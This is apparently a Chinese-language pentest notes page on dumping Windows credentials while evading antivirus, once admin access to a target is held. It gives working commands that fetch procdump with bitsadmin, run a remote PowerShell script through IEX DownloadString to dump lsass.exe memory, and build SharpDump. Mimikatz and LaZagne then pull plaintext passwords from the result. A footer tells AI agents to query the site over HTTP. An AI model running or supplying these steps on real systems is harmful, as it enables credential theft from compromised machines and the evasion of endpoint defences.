# 免杀抓取明文 ## 1、前提条件 必须已经事先拿到目标机器的管理权限,且看到有管理员的登录会话 ``` query user ``` ![](/files/-MDxkWRMJswaXtqapKqi) ## 2、Prodump 直接指定 lsass.exe 进程名进行抓取即可,之后只需把生成的 lsass.dmp 文件拖回本地 ``` cd c:\Windows\Temp bitsadmin /rawreturn /transfer getfile https://raw.githubusercontent.com/klionsec/CommonTools/master/procdump.exe c:\windows\temp\dump.exe dump.exe -accepteula -ma lsass.exe lsass.dmp ``` ![](/files/-MDxkj2_N0mIgE39Xrri) 接着,再在本地用 mimikatz.exe 去加载读取即可\[版本保持一致] ``` mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit ``` ![](/files/-MDxksEw2VvFzNCFcEOH) ## 3、powershell ### 1、远程执行: 只适用于 2008r2 之后的系统 ``` powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/klionsec/CommonTools/master/Out-Minidump.ps1'); Get-Process lsass | Out-Minidump -DumpFilePath c:\windows\temp" tasklist | findstr /c:"egui.exe" /c:"ekrn.exe" dir c:\windows\Temp | findstr "lsass ``` ![](/files/-MDxlW3At1_cM0Jk-MZZ) 同样,之后只需把 lsass\_504.dmp 文件拖到本地机器再用 mimikatz.exe 加载读取即可 ``` mimikatz.exe "sekurlsa::minidump lsass_596.dmp" "sekurlsa::logonPasswords full" exit ``` ![](/files/-MDxlex-8R3HYta9mXxS) ### 2、本地执行 ``` powershell –exec bypass –Command "& {Import-Module 'C:\Tools\Out-Minidump.ps1'; Get-Process lsass | Out-Minidump -DumpFilePath c:\windows\temp}" ``` ![](/files/-MDxlo_aBzlL6se0v0Pn) PS: powershell 导 lsass.exe 进程数据差不多文件要比用 prodump 导的小 10M 左右 ``` mimikatz.exe "sekurlsa::minidump lsass_596.dmp" "sekurlsa::logonPasswords full" exit ``` ![](/files/-MDxm9lruQpTzL_3yT0W) ## 4、sharpDump 项目地址: 将.sln用MSBuild编译成.exe ``` %SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe E:\SharpDump-master\SharpDump.sln /t:Rebuild /p:Configuration=Release ``` ![](/files/-MDxmeL20ua__MIULcs0) 直接运行: ![](/files/-MDxmlJDvfspeGUPsYeJ) 需要线把 bin 重命名为 zip 后缀,然后正常解压出里面的 文件,再给 mimikatz 去读取即可 ``` mimikatz.exe "sekurlsa::minidump debug596" "sekurlsa::logonPasswords full" "exit" ``` ![](/files/-MDxmvdz0wYu0505IpLJ) ## 5、LaZagne(python) 项目地址: 下载直接运行`lazgne.exe all` ![](/files/-MDxnUlv1bE4Q6Y6OjP-) ![](/files/-MDxnYPPZmpZyftiWlvI) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://xu-an.gitbook.io/sec/os/win/bypass-to-hash.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.